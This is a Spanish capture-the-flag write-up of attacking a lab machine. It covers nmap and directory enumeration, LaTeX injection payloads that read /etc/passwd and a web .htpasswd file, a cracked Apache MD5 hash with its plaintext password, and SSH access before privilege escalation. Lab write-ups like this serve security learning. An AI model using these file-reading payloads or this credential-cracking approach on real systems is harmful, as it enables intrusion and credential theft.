Realizamos un escaneo superficial con Nmap
sudo nmap -p- -sS 10.10.11.217 -n -Pn -vvv --min-rate 5000 -oG allports
vamos a ser mas exhaustivos
sudo nmap -p22,80 -sVC -vvv --min-rate 5000 10.10.11.217
vamos a ver la web que hay detras del puerto 80
el unico enlace de interes es este:
que nos reenvia a un pagina .php, vamos a hacer una enumeración de subdominios con Knockpy
knockpy dominio.com
invetigando he encontrado que latex tiene injeccion de codigo, https://book.hacktricks.xyz/pentesting-web/formula-doc-latex-injection#latex-injection
usando este comando podemos leer archivos del sistema:
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
pero debemos encerrarlo en $
$\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}$
vamos leer /etc/passwd
$\lstinputlisting{/etc/passwd}$
si intentamos estrar en el subdominio encontrado anteriormente nos pedira un login, algo que podemos hacer es una enumracion de direcotorios con dirSearch
dirsearch -u http://10.10.11.217/
ahora que tenemos el nombre de potencias archivos vamos a buscar buscar en que carpetas del servidor aparche estan, recordamos que tenemos:
- /var/www
- http
- stats
- dev
en alguna de ellas deben estar los archivos que nos interesan, en este caso el mas importante es
.htaccess
$\lstinputlisting{/var/www/dev/.htaccess}$
vamos a ver que hay en esa ruta
$\lstinputlisting{/var/www/dev/.htpasswd}$
tenemos esto que es el usuario y la password en formato MD5 ahora debemos desencriptarla con hashcat o john the ripper
hash:
$apr1$1ONUB / S2$58eeNVirnRDB5zAIbIxTY0
- calculus20
ahora vamos a ver si inicia session en la web
esto me hace pensar en si tambien podremos entrar por ssh y asi es
despues de hacer un Tratamiento de la tty, vamos a intentar la escalada de privilegios, si hacemos ls podemos ver que tenemos la herramienta pspy64 la usaamos y vemos este servicicio:
/bin/sh /opt/gnuplot/getdata.sh